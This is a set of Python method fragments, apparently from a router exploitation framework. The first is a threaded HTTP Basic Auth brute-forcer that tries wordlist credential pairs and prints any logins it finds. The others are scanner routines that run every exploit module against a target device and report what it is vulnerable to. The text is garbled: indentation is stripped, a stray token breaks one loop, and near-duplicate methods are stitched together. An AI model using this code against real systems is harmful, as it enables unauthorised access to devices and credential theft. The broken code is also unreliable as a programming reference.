def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = itertools.product(usernames, passwords)
with threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
self.vulnerabilities = []
self.not_verified = []
target = utils.safe_json_loads(self.target)
if target:
self.target = target
with threads.ThreadPoolExecutor(self.threads) as executor:
for directory in self._exploits_directories:
for exploit in utils.iter_modules(directory):
executor.submit(self.target_function, exploit)
print_info()
if self.not_verified:
print_status("Could not verify exploitability:")
for v in self.not_verified:
print_info(" - {}".format(v))
print_info()
if self.vulnerabilities:
print_success("Device is vulnerable:")
for v in self.vulnerabilities:
print_info(" - {}".format(v))
print_info()
else:
print_error("Could not confirm any vulnerablity\n")
def run(self):
self.vulnerabilities = []
self.not_verified = []
with threads.ThreadPoolExecutor(self.threads) as executor:
for directory in self._exploits_directories:call
for exploit in utils.iter_modules(directory):
executor.submit(self.target_function, exploit)
def run(self):
self.vulnerabilities = []
with threads.ThreadPoolExecutor(self.threads) as executor:
for exploit in utils.iter_modules(self._exploits_directory):
executor.submit(self.target_function, exploit)
print_info()
if self.vulnerabilities:
print_success("Device is vulnerable!")
for v in self.vulnerabilities:
print_info(" - {}".format(v))
print_info()
else:
print_error("Device is not vulnerable to any exploits!\n")